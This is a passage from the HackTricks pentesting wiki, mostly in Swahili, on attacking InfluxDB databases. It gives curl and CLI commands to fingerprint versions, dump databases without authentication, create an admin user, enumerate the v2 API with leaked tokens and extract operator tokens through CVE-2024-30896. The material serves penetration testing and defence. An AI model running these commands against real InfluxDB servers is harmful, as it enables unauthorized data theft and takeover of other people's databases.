8086 - Pentesting InfluxDB

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

InfluxDB ni chanzo wazi cha time series database (TSDB) kilichotengenezwa na InfluxData. TSDB zimeboreshwa kuhifadhi na kutumikia data za mfululizo wa wakati, ambazo zinaundwa na jozi za alama za wakati na thamani. Ikilinganishwa na databeses za matumizi ya jumla, TSDB hutoa maboresho makubwa katika nafasi ya kuhifadhi na utendaji kwa seti za data za mfululizo wa wakati. Zinatumia algorithi maalumu za kompresi na zinaweza kusanidiwa kuondoa kiotomatiki data za zamani. Viashiria maalumu vya databasi pia huboresha utendaji wa maswali.

Default port: 8086

PORT     STATE SERVICE VERSION
8086/tcp open  http    InfluxDB http admin 1.7.5

Tambua na Toleo (HTTP)

  • v1.x: GET /ping inarejesha status 204 na headers kama X-Influxdb-Version na X-Influxdb-Build.
  • v2.x+: GET /health inarejesha JSON yenye toleo la server na status. Inafanya kazi bila auth.
# v1 banner grab
curl -i http://<host>:8086/ping

# v2/compat health
curl -s http://<host>:8086/health | jq .

Vidokezo: instances zilizofichuka mara nyingi pia hutoa Prometheus-style metrics katika /metrics.

Enumeration

Kwa mtazamo wa pentester, hii ni hifadhidata nyingine ambayo inaweza kuhifadhi taarifa nyeti, kwa hivyo inafaa kujua jinsi ya dump taarifa zote.

Authentication

InfluxDB inaweza kuhitaji authentication au la.

# Try unauthenticated CLI (v1 shell)
influx -host <host> -port 8086
> use _internal

Ikiwa unapata kosa kama hili: ERR: unable to parse authentication credentials ina maana kwamba inatarajia credentials fulani

influx –username influx –password influx_pass

Kulikuwa na udhaifu kwenye influxdb ulioruhusu kupita authentication: CVE-2019-20933

Manual Enumeration (v1 HTTP API / InfluxQL)

Hata wakati hakuna CLI, HTTP API kwa kawaida huwa wazi kwenye port 8086.

# List databases (unauth)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

# List retention policies of a DB
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"

# List users (if auth disabled)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"

# List measurements (tables)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"

# List field keys (columns)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"

# Dump data from a measurement
curl -sG "http://<host>:8086/query" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .

# Force epoch timestamps (useful for tooling)
curl -sG "http://<host>:8086/query" \
--data-urlencode "epoch=ns" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'

Warning

Katika baadhi ya majaribio na authentication bypass ilibainika kwamba jina la jedwali lilihitajiwe kuwekwa ndani ya nukuu mbili kama: select * from "cpu"

Ikiwa authentication imezimwa, unaweza hata create users na escalate:

# Create an admin user (v1, auth disabled)
curl -sG "http://<host>:8086/query" \
--data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"

Taarifa za mfano wa CLI ufuatao zilichukuliwa kutoka here.

Onyesha hifadhidata

Hifadhidata zilizopatikana ni telegraf na internal (utakutana nayo kila mahali)

> show databases
name: databases
name
----
telegraf
_internal

Onyesha jedwali/measurements

Maelezo katika InfluxDB documentation yanaeleza kwamba measurements katika InfluxDB yanaweza kulinganishwa na SQL tables. Mfumo wa majina wa measurements hizi unaonyesha yaliyomo yao, kila moja ikihifadhi data inayohusiana na entiti fulani.

> show measurements
name: measurements
name
----
cpu
disk
diskio
kernel
mem
processes
swap
system

Onyesha safu/funguo za uwanja

Funguo za uwanja ni kama safu za hifadhidata

> show field keys
name: cpu
fieldKey         fieldType
--------         ---------
usage_guest      float
usage_guest_nice float
usage_idle       float
usage_iowait     float

name: disk
fieldKey     fieldType
--------     ---------
free         integer
inodes_free  integer
inodes_total integer
inodes_used  integer

[ ... more keys ...]

Dump Table

Na hatimaye unaweza dump the table kwa kufanya kitu kama

select * from cpu
name: cpu
time                cpu       host   usage_guest usage_guest_nice usage_idle        usage_iowait        usage_irq usage_nice usage_softirq        usage_steal usage_system        usage_user
----                ---       ----   ----------- ---------------- ----------        ------------        --------- ---------- -------------        ----------- ------------        ----------
1497018760000000000 cpu-total ubuntu 0           0                99.297893681046   0                   0         0          0                    0           0.35105315947842414 0.35105315947842414
1497018760000000000 cpu1      ubuntu 0           0                99.69909729188728 0                   0         0          0                    0           0.20060180541622202 0.10030090270811101

InfluxDB v2.x API (Token-based)

InfluxDB 2.x inatambulisha token-based auth na API mpya (bado kwenye 8086 kwa default). Ikiwa utapata token (leaked logs, default deployments, backups) unaweza kuorodhesha:

# Basic org, bucket, and auth discovery
TOKEN="<token>"; H="-H Authorization: Token $TOKEN"

# Health & version
curl -s http://<host>:8086/health | jq .

# List organizations
curl -s $H http://<host>:8086/api/v2/organizations | jq .

# List buckets
curl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

# List authorizations (requires perms)
ORGID=<org_id>
curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

# Query data with Flux
curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
-X POST http://<host>:8086/api/v2/query \
--data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'

Vidokezo

  • Kwa v1.8+, kuna baadhi ya endpoints zinazolingana na v2 (/api/v2/query, /api/v2/write, /health). Hii ni muhimu ikiwa server ni v1 lakini inakubali maombi mtindo wa v2.
  • Kwa v2, header ya HTTP Authorization lazima iwe katika muundo Token <value>.

Uorodheshaji wa Kiotomatiki

msf6 > use auxiliary/scanner/http/influxdb_enum

Hivi karibuni vulns and privesc za kuvutia (miaka ya hivi karibuni)

  • InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Katika mazingira maalum, mtumiaji aliyethibitishwa akiwa na ufikaji wa kusoma kwa authorization resource katika default organization angeweza kuorodhesha na kupata instance-wide operator token (e.g., via influx auth ls or GET /api/v2/authorizations). Akiwa na token hiyo, mshambuliaji anaweza kusimamia instance (buckets, tokens, users) na kufikia data zote kwenye orgs. Sasisha kwa build iliyorekebishwa itakapopatikana na epuka kuweka watumiaji wa kawaida katika default org. Jaribio la haraka:
# Using a low-priv/all-access token tied to the default org
curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
# Look for entries of type "operator" and extract the raw token (if present)
  • Mipangilio mingi ya legacy 1.x bado inaonyesha /query na /write bila uthibitisho mtandaoni. Ikiwa auth imezimwa, unaweza kunakili au hata kubadilisha time-series kwa mapenzi; unaweza pia kuunda watumiaji wa admin kama ilivyoonyeshwa hapo juu. Daima thibitisha kwa kutumia HTTP API hata kama CLI inakuzuia.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks